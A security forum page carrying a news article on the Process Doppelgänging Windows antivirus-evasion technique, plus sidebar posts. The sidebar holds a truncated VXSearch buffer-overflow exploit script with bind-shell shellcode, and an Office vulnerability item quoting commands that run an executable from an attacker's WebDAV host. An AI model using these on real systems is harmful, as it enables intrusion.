Jump to content

Process Doppelgänging: New Malware Evasion Technique Works On All Windows Versions

Recommended Posts



A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools.

Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader.

Ensilo security researchers Please login or register to see this link. and Eugene Kogan, who discovered the Process Doppelgänging attack, Please login or register to see this link. their findings today at Black Hat 2017 Security conference held in London.


Process Doppelgänging Works on All Windows Versions


Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.


Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products.

In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running.

Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.


Here's How the Process Doppelgänging Attack Works:


Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions.

Please login or register to see this link. is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically.


NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:

  1. Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file.
  2. Load—create a memory section from the modified (malicious) file.
  3. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed.
  4. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs."


Process Doppelgänging Evades Detection from Most Antiviruses


Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools.

In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection.

When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below:



However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article.

Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year.

But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers.

Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated Please login or register to see this link. which also abused a designing weakness in Windows OS.

In September, enSilo researchers also disclosed a 17-year-old programming error in Please login or register to see this link. that prevented security software from detecting malware at runtime when loaded into system memory.


Via Please login or register to see this link.

  • Like 1
  • Upvote 1

Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Similar Content

    • By Fi8sVrs
      #!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 "\x50" # push eax "\x5c" # pop esp ) shellcode += ( "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" # 0day.today [2017-11-17] # Source: Please login or register to see this link.
    • By Fi8sVrs

      You should be extra careful when opening files in MS Office.

      When the world is still dealing with the threat of 'unpatched' Microsoft Office's Please login or register to see this link. , researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

      The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
      Discovered by the security researchers at Please login or register to see this link. , the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

      The vulnerability, identified as Please login or register to see this link. , resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.   However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

      Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.   DEMO: Exploitation Allows Full System Take Over  
      Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

      This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).
      Possible Attack Scenario:
      While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:     "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)." "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker." "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient." "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."   Protection Against Microsoft Office Vulnerability   With this Please login or register to see this link. , Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.
      So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

      Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

      Users can run the following command in the command prompt to disable registering of the component in Windows registry: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 For 32-bit Microsoft Office package in x64 OS, run the following command:
      reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).
      Via Please login or register to see this link.
    • By u0m3
      Synopsis: Noriben is a Python-based script that works in conjunction with SysInternals Procmon to automatically collect, analyze, and report on run-time indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.
      Link: Please login or register to see this link.
    • By u0m3
      Synopsis: In past blog posts, we shared our Please login or register to see this link. to hunting for traditional in-memory attacks along with in-depth Please login or register to see this link. of many injection techniques. As a follow up to my DerbyCon Please login or register to see this link. , this post will investigate an emerging Please login or register to see this link. of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complimentary, and together result in the most robust defense against in-memory attacks.
      Link: Please login or register to see this link.
    • By u0m3
      Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.
      Link: Please login or register to see this link.  (via Please login or register to see this link. )